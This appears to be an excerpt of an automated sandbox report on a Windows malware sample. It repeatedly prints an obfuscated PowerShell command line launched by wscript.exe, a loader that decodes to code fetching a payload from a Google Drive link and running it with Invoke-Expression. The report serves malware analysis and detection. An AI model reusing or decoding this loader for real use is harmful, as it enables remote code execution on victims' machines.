BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_074D0C82 push eax; mov dword ptr [esp], ecx		12_2_074D0E84
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_074D0E79 push eax; mov dword ptr [esp], ecx		12_2_074D0E84

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
